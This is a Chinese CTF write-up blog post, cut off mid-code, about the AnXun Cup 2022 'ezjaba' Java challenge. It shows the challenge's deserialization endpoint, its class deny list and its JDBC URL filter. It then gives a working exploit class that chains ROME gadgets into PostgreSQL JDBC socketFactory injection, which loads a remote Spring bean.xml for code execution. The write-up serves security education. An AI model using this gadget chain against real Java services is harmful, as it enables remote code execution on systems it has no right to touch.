<!DOCTYPE html>
<html lang="zh-CN">
    <head prefix="og: https://ogp.me/ns#">
  <meta charset="utf-8">
  <meta name="referrer" content="no-referrer" />
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="color-scheme" content="light dark">
  
  <title>安洵杯2022 ezjaba - Boogiepop Doesn&#39;t Laugh</title>
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
    <link rel='manifest' href='/manifest.json'>
  

  
  
  
  <meta property="og:title" content="安洵杯2022 ezjaba - Boogiepop Doesn&#39;t Laugh" />
  
  <meta property="og:type" content="article" />
  
  <meta property="og:url" content="http://boogipop.com/2023/03/29/%E5%AE%89%E6%B4%B5%E6%9D%AF2022%20_%20ezjaba/index.html" />
  
  <meta property="og:image" content="/favicon.png" />
  
  <meta property="og:article:published_time" content="2023-03-29T13:33:54.000Z" />
  
  <meta property="og:article:author" content="Boogipop" />
  
  

  
<link rel="stylesheet" href="/css/var.css">

  
<link rel="stylesheet" href="/css/main.css">

  
<link rel="stylesheet" href="/css/typography.css">

  
<link rel="stylesheet" href="/css/code-highlighting.css">

  
<link rel="stylesheet" href="/css/components.css">

  
<link rel="stylesheet" href="/css/nav.css">

  
<link rel="stylesheet" href="/css/paginator.css">

  
<link rel="stylesheet" href="/css/footer.css">

  
<link rel="stylesheet" href="/css/post-list.css">

  
<link rel="stylesheet" href="/css/giscus.css">

  
  
<link rel="stylesheet" href="/css/rainbow-banner.css">

  
  
  
<link rel="stylesheet" href="/css/toc.css">

  
  
    
<link rel="stylesheet" href="/css/giscus.css">

  
  
  
  
<link rel="stylesheet" href="/css/post.css">

  
  
  
  
  

  
<meta name="generator" content="Hexo 6.3.0"></head>
    <body
        data-color-scheme="auto"
        data-uppercase-categories="true"
        
        data-rainbow-banner="true"
        data-rainbow-banner-shown="auto"
        data-rainbow-banner-month="6"
        data-rainbow-banner-colors="#e50000,#ff8d00,#ffee00,#008121,#004cff,#760188"
        
        data-config-root="/"
        
        data-toc="true"
        data-toc-max-depth="2"
        
        
    >
        <nav id="theme-nav">
    <div class="inner">
        <a class="title" href="/">Blog</a>
        <div class="nav-arrow"></div>
        <div class="nav-items">
            <a class="nav-item nav-item-home" href="/">Home</a>
            
            
            <a class="nav-item" href="/archives">Archives</a>
            
            
            
            <a class="nav-item" href="/friends">Friends</a>
            
            
            
            <a class="nav-item" href="/about">About</a>
            
            
            
            <a class="nav-item" href="/categories">Categories</a>
            
            
            
            <a class="nav-item nav-item-github nav-item-icon" href="https://github.com/MrWillCom" target="_blank" aria-label="GitHub">&nbsp;</a>
            
            
            
            <a class="nav-item nav-item-codepen nav-item-icon" href="https://codepen.io/mrwillcom" target="_blank" aria-label="CodePen">&nbsp;</a>
            
            
            
            <a class="nav-item nav-item-patreon nav-item-icon" href="https://www.patreon.com/MrWillCom" target="_blank" aria-label="Patreon">&nbsp;</a>
            
            
            
            <a class="nav-item nav-item-mastodon nav-item-icon" href="https://noc.social/@MrWillCom" target="_blank" aria-label="Mastodon">&nbsp;</a>
            
            
            
            <a class="nav-item nav-item-discord nav-item-icon" href="https://discord.gg/UKuFDjcfY8" target="_blank" aria-label="Discord">&nbsp;</a>
            
            
            
            <a class="nav-item nav-item-search nav-item-icon" href="/search" target="_blank" aria-label="Search">&nbsp;</a>
            
            
        </div>
    </div>
</nav>
        
<article class="post">
    <div class="meta">
        
        <div class="categories text-uppercase">
        
            <a href="/categories/WriteUp/">WriteUp</a>
        
        </div>
        

        
        <div class="date" id="date">
            <span>March</span>
            <span>29,</span>
            <span>2023</span>
        </div>
        

        <h2 class="title">安洵杯2022 ezjaba</h2>
    </div>

    <div class="divider"></div>

    <div class="content">
        <p>考点：JDBC反序列化，postgresql-JDBC？</p>
<h1 id="一、惯例审题环节"><a href="#一、惯例审题环节" class="headerlink" title="一、惯例审题环节"></a>一、惯例审题环节</h1><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Source code recreated from a .class file by IntelliJ IDEA</span></span><br><span class="line"><span class="comment">// (powered by FernFlower decompiler)</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">package</span> com.example.ezjaba.controller;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.example.ezjaba.security.SecurityObjectInpitStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.InputStream;</span><br><span class="line"><span class="keyword">import</span> java.util.Base64;</span><br><span class="line"><span class="keyword">import</span> org.springframework.web.bind.annotation.RequestMapping;</span><br><span class="line"><span class="keyword">import</span> org.springframework.web.bind.annotation.RequestParam;</span><br><span class="line"><span class="keyword">import</span> org.springframework.web.bind.annotation.RestController;</span><br><span class="line"></span><br><span class="line"><span class="meta">@RestController</span></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">IndexController</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">IndexController</span><span class="params">()</span> &#123;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@RequestMapping(&#123;&quot;/&quot;&#125;)</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">index</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;hello&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="meta">@RequestMapping(&#123;&quot;/read&quot;&#125;)</span></span><br><span class="line">    <span class="keyword">public</span> String <span class="title function_">welcome</span><span class="params">(<span class="meta">@RequestParam(name = &quot;data&quot;,required = true)</span> String data)</span> <span class="keyword">throws</span> IOException, ClassNotFoundException &#123;</span><br><span class="line">        <span class="type">InputStream</span> <span class="variable">inputStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayInputStream</span>(Base64.getDecoder().decode(data));</span><br><span class="line">        <span class="type">SecurityObjectInpitStream</span> <span class="variable">objectInputStream</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">SecurityObjectInpitStream</span>(inputStream);</span><br><span class="line">        <span class="type">String</span> <span class="variable">name</span> <span class="operator">=</span> objectInputStream.readUTF();</span><br><span class="line">        <span class="type">int</span> <span class="variable">year</span> <span class="operator">=</span> objectInputStream.readInt();</span><br><span class="line">        <span class="keyword">if</span> (name.equals(<span class="string">&quot;axb&quot;</span>) &amp;&amp; year == <span class="number">2022</span>) &#123;</span><br><span class="line">            objectInputStream.readObject();</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="string">&quot;赛博功夫点到及止&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>赛博功夫，read路由有一个反序列化入口点，前面的if判断我们生成payload的时候用writeUTF和writeInt写进去就好了，没啥东西<br>再看看其他包里，connection包中有进行JDBC连接的地方</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Source code recreated from a .class file by IntelliJ IDEA</span></span><br><span class="line"><span class="comment">// (powered by FernFlower decompiler)</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">package</span> com.example.ezjaba.Connection;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.example.ezjaba.security.JdbcUtils;</span><br><span class="line"><span class="keyword">import</span> java.io.Serializable;</span><br><span class="line"><span class="keyword">import</span> java.sql.Connection;</span><br><span class="line"><span class="keyword">import</span> java.sql.DriverManager;</span><br><span class="line"><span class="keyword">import</span> java.sql.SQLException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">Database</span> <span class="keyword">implements</span> <span class="title class_">Serializable</span>, Data &#123;</span><br><span class="line">    <span class="keyword">public</span> String database;</span><br><span class="line">    <span class="keyword">public</span> String host;</span><br><span class="line">    <span class="keyword">public</span> String username;</span><br><span class="line">    <span class="keyword">public</span> String password;</span><br><span class="line">    <span class="keyword">public</span> Connection connection;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">Database</span><span class="params">()</span> &#123;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> Connection <span class="title function_">getConnection</span><span class="params">()</span> &#123;</span><br><span class="line">        <span class="type">String</span> <span class="variable">url</span> <span class="operator">=</span> <span class="string">&quot;jdbc:&quot;</span> + <span class="built_in">this</span>.database + <span class="string">&quot;://&quot;</span> + <span class="built_in">this</span>.host + <span class="string">&quot;:5432/axb?user=&quot;</span> + <span class="built_in">this</span>.username + <span class="string">&quot;&amp;password&quot;</span> + <span class="built_in">this</span>.password;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">try</span> &#123;</span><br><span class="line">            JdbcUtils.filterJdbcUrl(url);</span><br><span class="line">            <span class="built_in">this</span>.connection = DriverManager.getConnection(url);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (SQLException var3) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">RuntimeException</span>(var3);</span><br><span class="line">        &#125; <span class="keyword">catch</span> (Exception var4) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">RuntimeException</span>(var4);</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">return</span> <span class="built_in">this</span>.connection;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setDatabase</span><span class="params">(String database)</span> &#123;</span><br><span class="line">        <span class="built_in">this</span>.database = database;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setHots</span><span class="params">(String host)</span> &#123;</span><br><span class="line">        <span class="built_in">this</span>.host = host;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setUsername</span><span class="params">(String username)</span> &#123;</span><br><span class="line">        <span class="built_in">this</span>.username = username;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">void</span> <span class="title function_">setPassword</span><span class="params">(String password)</span> &#123;</span><br><span class="line">        <span class="built_in">this</span>.password = password;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>这里调用了DriverManager.getConnection进行JDBC连接，但在这之前有一层判断</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Source code recreated from a .class file by IntelliJ IDEA</span></span><br><span class="line"><span class="comment">// (powered by FernFlower decompiler)</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">package</span> com.example.ezjaba.security;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">JdbcUtils</span> &#123;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">String</span> <span class="variable">JDBC_MYSQL_PROTOCOL</span> <span class="operator">=</span> <span class="string">&quot;jdbc:mysql&quot;</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">String</span> <span class="variable">SENSITIVE_PARAM</span> <span class="operator">=</span> <span class="string">&quot;autoDeserialize=true&quot;</span>;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">final</span> <span class="type">String</span> <span class="variable">FILE_READ</span> <span class="operator">=</span> <span class="string">&quot;allowLoadLocalInfile=true&quot;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">JdbcUtils</span><span class="params">()</span> &#123;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">filterJdbcUrl</span><span class="params">(String url)</span> <span class="keyword">throws</span> Exception &#123;</span><br><span class="line">        <span class="keyword">if</span> (url.startsWith(<span class="string">&quot;jdbc:mysql&quot;</span>) &amp;&amp; (url.contains(<span class="string">&quot;autoDeserialize=true&quot;</span>) || url.contains(<span class="string">&quot;allowLoadLocalInfile=true&quot;</span>))) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">Exception</span>(<span class="string">&quot;那就这样吧，再连接就不太礼貌了&quot;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>这里简单的把常规的payload ban掉了也就是最熟悉的mysql jdbc反序列化，除此之外仔细观察read路由，里面用的输出流也不是原生的，而是自定义重写的</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Source code recreated from a .class file by IntelliJ IDEA</span></span><br><span class="line"><span class="comment">// (powered by FernFlower decompiler)</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">package</span> com.example.ezjaba.security;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.rometools.rome.feed.impl.EqualsBean;</span><br><span class="line"><span class="keyword">import</span> com.rometools.rome.feed.impl.ObjectBean;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;</span><br><span class="line"><span class="keyword">import</span> com.sun.rowset.JdbcRowSetImpl;</span><br><span class="line"><span class="keyword">import</span> java.io.IOException;</span><br><span class="line"><span class="keyword">import</span> java.io.InputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.InvalidClassException;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectStreamClass;</span><br><span class="line"><span class="keyword">import</span> java.security.SignedObject;</span><br><span class="line"><span class="keyword">import</span> java.util.ArrayList;</span><br><span class="line"><span class="keyword">import</span> java.util.List;</span><br><span class="line"><span class="keyword">import</span> javax.management.BadAttributeValueExpException;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">SecurityObjectInpitStream</span> <span class="keyword">extends</span> <span class="title class_">ObjectInputStream</span> &#123;</span><br><span class="line">    <span class="keyword">private</span> List&lt;String&gt; list = <span class="keyword">new</span> <span class="title class_">ArrayList</span>();</span><br><span class="line"></span><br><span class="line">    <span class="keyword">public</span> <span class="title function_">SecurityObjectInpitStream</span><span class="params">(InputStream inputStream)</span> <span class="keyword">throws</span> IOException &#123;</span><br><span class="line">        <span class="built_in">super</span>(inputStream);</span><br><span class="line">        <span class="built_in">this</span>.list.add(BadAttributeValueExpException.class.getName());</span><br><span class="line">        <span class="built_in">this</span>.list.add(ObjectBean.class.getName());</span><br><span class="line">        <span class="built_in">this</span>.list.add(EqualsBean.class.getName());</span><br><span class="line">        <span class="built_in">this</span>.list.add(TemplatesImpl.class.getName());</span><br><span class="line">        <span class="built_in">this</span>.list.add(Runtime.class.getName());</span><br><span class="line">        <span class="built_in">this</span>.list.add(SignedObject.class.getName());</span><br><span class="line">        <span class="built_in">this</span>.list.add(JdbcRowSetImpl.class.getName());</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">protected</span> Class&lt;?&gt; resolveClass(ObjectStreamClass desc) <span class="keyword">throws</span> IOException, ClassNotFoundException &#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">this</span>.list.contains(desc.getName())) &#123;</span><br><span class="line">            <span class="keyword">throw</span> <span class="keyword">new</span> <span class="title class_">InvalidClassException</span>(<span class="string">&quot;hacker!!!!!!!!!!!&quot;</span>);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="built_in">super</span>.resolveClass(desc);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>ban掉了上面list中的类，也就是</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">BadAttributeValueExpException</span><br><span class="line">ObjectBean</span><br><span class="line">EqualsBean</span><br><span class="line">TemplatesImpl</span><br><span class="line">Runtime</span><br><span class="line">SignedObject</span><br><span class="line">JdbcRowSetImpl</span><br></pre></td></tr></table></figure>
<p>再看看题目给的依赖：<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32634994/1679495624069-2f4a1df3-66bb-4c48-be4f-ac1c30cb2873.png#averageHue=%232a2c28&clientId=u7e8aa54c-a67b-4&from=paste&height=510&id=ue1fab472&name=image.png&originHeight=510&originWidth=1550&originalType=binary&ratio=1&rotation=0&showTitle=false&size=1056860&status=done&style=none&taskId=ud8d5a503-9985-44d0-b765-fe1806382cf&title=&width=1550" alt="image.png"><br>有个ROME，那就是说明肯定是打Rome链，只不过我们开局的ToString断掉了，我们需要想办法去触发ToStringBean的Tostring方法，这也就是西湖论剑里我们常用的xstring和hotswapper，那链子我们是接上了，触发ToStringBean后就会调用任意的get，set方法，而database类里面有一个<code>getConnection</code>，那么必然会调用这个方法，从而存在JDBC反序列化，基本思路就是这样</p>
<h1 id="二、解题环节"><a href="#二、解题环节" class="headerlink" title="二、解题环节"></a>二、解题环节</h1><h2 id="（1）预期解-PostgrelSQL反序列化"><a href="#（1）预期解-PostgrelSQL反序列化" class="headerlink" title="（1）预期解 PostgrelSQL反序列化"></a>（1）预期解 PostgrelSQL反序列化</h2><p>正常逻辑是看到mysql被ban了，同时依赖中又给了postgresql的依赖，那自然就想到了它的反序列化，而这边在网上检索了一番后也是确实发现了有关的CVE<br><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/11812#toc-4">https://xz.aliyun.com/t/11812#toc-4</a><br><img src="https://cdn.nlark.com/yuque/0/2023/png/32634994/1679547626406-30044ade-15d7-4682-af92-0e14b7bfedbf.png#averageHue=%23f2f2f2&clientId=u7e8aa54c-a67b-4&from=paste&height=948&id=u8f81f3b7&name=image.png&originHeight=948&originWidth=1738&originalType=binary&ratio=1&rotation=0&showTitle=false&size=162435&status=done&style=none&taskId=u2fe3d061-9519-4d0f-ae41-e2a48303fa5&title=&width=1738" alt="image.png"><br>这张图概括将利用链概括的很好，最后一部分那个CVE2017可以忽略，我们并不需要走那条路，我们只需要利用它前面的ctor.newinstance去初始化springframework一个很熟悉的类，<code>ClassPathXmlApplicationContext</code>,学过Spring的人对这个类肯定不陌生，这就是初始化我们bean的一个类，他的构造函数可以读取xml文件并实例化bean<br><img src="https://cdn.nlark.com/yuque/0/2023/png/32634994/1679547738033-f5862d6d-2530-409d-9899-ad73ac13bbb3.png#averageHue=%232e2e28&clientId=u7e8aa54c-a67b-4&from=paste&height=498&id=u7f72fe21&name=image.png&originHeight=498&originWidth=1199&originalType=binary&ratio=1&rotation=0&showTitle=false&size=848834&status=done&style=none&taskId=u7dee970d-0548-46d8-8835-1182d425906&title=&width=1199" alt="image.png"><br>因此思路很明确，最后触发RCE的地方就在这，而前面的利用链我们理一下思路，首先是ROME链的后半段，要想办法接上toString，而Xstring和HotSwapper刚好可以接上，因此最终POC为如下构造</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">package</span> com.example.ezjaba.exp;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> com.example.ezjaba.Connection.Database;</span><br><span class="line"><span class="keyword">import</span> com.rometools.rome.feed.impl.ToStringBean;</span><br><span class="line"><span class="keyword">import</span> com.sun.org.apache.xpath.internal.objects.XString;</span><br><span class="line"><span class="keyword">import</span> org.springframework.aop.target.HotSwappableTargetSource;</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ByteArrayOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.util.Base64;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="keyword">class</span> <span class="title class_">exp</span> &#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception&#123;;</span><br><span class="line">        <span class="type">Database</span> <span class="variable">database</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Database</span>();</span><br><span class="line">        setFieldValue(database,<span class="string">&quot;database&quot;</span>,<span class="string">&quot;postgresql&quot;</span>);</span><br><span class="line">        setFieldValue(database,<span class="string">&quot;host&quot;</span>,<span class="string">&quot;127.0.0.1&quot;</span>);</span><br><span class="line">        setFieldValue(database,<span class="string">&quot;username&quot;</span>,<span class="string">&quot;boogipop&amp;socketFactory=org.springframework.context.support.ClassPathXmlApplicationContext&amp;socketFactoryArg=http://127.0.0.1:7777/bean.xml&quot;</span>);</span><br><span class="line">        <span class="type">ToStringBean</span> <span class="variable">toStringBean</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ToStringBean</span>(Database.class,database);</span><br><span class="line">        <span class="type">HotSwappableTargetSource</span> <span class="variable">h2</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HotSwappableTargetSource</span>(<span class="keyword">new</span> <span class="title class_">XString</span>(<span class="string">&quot;123&quot;</span>));</span><br><span class="line">        <span class="type">HotSwappableTargetSource</span> <span class="variable">h1</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">HotSwappableTargetSource</span>(toStringBean);</span><br><span class="line">        <span class="comment">// 执行序列化与反序列化，并且返回序列化数据</span></span><br><span class="line">        HashMap&lt;Object, Object&gt; map = <span class="keyword">new</span> <span class="title class_">HashMap</span>();</span><br><span class="line">        map.put(h1,h1);</span><br><span class="line">        map.put(h2,h2);</span><br><span class="line">        <span class="type">ByteArrayOutputStream</span> <span class="variable">bs</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayOutputStream</span>();</span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">out</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(bs);</span><br><span class="line">        out.writeUTF(<span class="string">&quot;axb&quot;</span>);</span><br><span class="line">        out.writeInt(<span class="number">2022</span>);</span><br><span class="line">        out.writeObject(map);</span><br><span class="line">        <span class="comment">// 输出序列化的Base64编码字符</span></span><br><span class="line">        Base64Encode(bs);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> ByteArrayOutputStream <span class="title function_">unSerial</span><span class="params">(Object o)</span> <span class="keyword">throws</span> Exception&#123;</span><br><span class="line">        <span class="type">ByteArrayOutputStream</span> <span class="variable">bs</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ByteArrayOutputStream</span>();</span><br><span class="line">        <span class="type">ObjectOutputStream</span> <span class="variable">out</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectOutputStream</span>(bs);</span><br><span class="line">        out.writeObject(o);</span><br><span class="line">        <span class="type">ObjectInputStream</span> <span class="variable">in</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">ObjectInputStream</span>(<span class="keyword">new</span> <span class="title class_">ByteArrayInputStream</span>(bs.toByteArray()));</span><br><span class="line">        in.readObject();</span><br><span class="line">        in.close();</span><br><span class="line">        <span class="keyword">return</span> bs;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title function_">Base64Encode</span><span class="params">(ByteArrayOutputStream bs)</span>&#123;</span><br><span class="line">        <span class="type">byte</span>[] encode = Base64.getEncoder().encode(bs.toByteArray());</span><br><span class="line">        <span class="type">String</span> <span class="variable">s</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">String</span>(encode);</span><br><span class="line">        System.out.println(s);</span><br><span class="line">        System.out.println(s.length());</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">private</span> <span class="keyword">static</span> <span 